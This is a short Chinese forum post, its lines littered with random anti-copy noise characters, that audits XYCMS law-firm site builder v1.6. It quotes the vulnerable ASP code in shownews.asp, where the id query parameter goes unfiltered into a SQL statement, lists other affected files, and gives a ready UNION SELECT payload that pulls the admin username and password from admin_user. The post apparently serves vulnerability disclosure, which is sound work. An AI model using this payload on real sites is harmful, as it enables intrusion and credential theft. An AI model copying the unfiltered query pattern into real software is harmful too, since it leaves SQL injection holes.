前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
. \" N3 R+ ^$ r/ q- k . x* J% G, o' [3 [7 b J! r- [
淫荡分割线( ]$ F/ w) d Q" [1 y L" T
--------------------------------------------------------
$ d* {' Z( B2 N, C/ S
% u! k7 E) V9 l- M) y9 {: ]审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)* G0 J1 `" v& [! T! B
源码地址:http://down.chinaz.com/soft/29233.htm
6 q+ B: p$ m8 c2 y5 ` Q" y 2 B6 |# g. I' k% f4 ]$ Y: I2 \
漏洞文件:shownews.asp. K' w) M/ M7 m* s4 i6 V+ m4 b
漏洞代码:7-13行
! T& P4 w7 y7 k- y+ I- D0 N2 t
9 A- J( g1 O9 n. N0 x" J1 m / v% Z% S1 i+ t: B& P' t* g* _
<%
% s9 y# _, x( L+ k( \id=request.QueryString("id")
) ?2 V7 f) v" G1 B& n9 G' V. u 1 W4 Y( ~2 k' E B, M( w
set snews=server.createobject("adodb.recordset")
# A+ k, q& u: aexec="select * from [news] where id="&id3 e+ y+ |- [5 S0 {
snews.open exec,conn,1,17 r6 q5 H' y; g A7 X: X- `
%>/ ?+ X9 k( k/ M' K% b( e3 K/ H& X( H
* a( ]$ o' |2 }/ p) J: q) ^% ^
; W, D- h) @6 m
什么过滤都没有 直造成注入$ _. P5 t; l, X9 P
8 u- w: z& R: w& _/ `注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 J4 k$ G _! \# e% | : Y# P% Y1 e+ m2 o" V/ J2 d% y
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
# | k8 h1 M' l) B& N5 i
$ _: I; H- i3 g* M# b/ n! ?
- _ w9 W9 a; Y; aexp: union select 1,admin,password,4,5,7 from admin_user
3 \$ `" I, W# Q& j, e
! M t3 N" T# K9 n( Y0 x |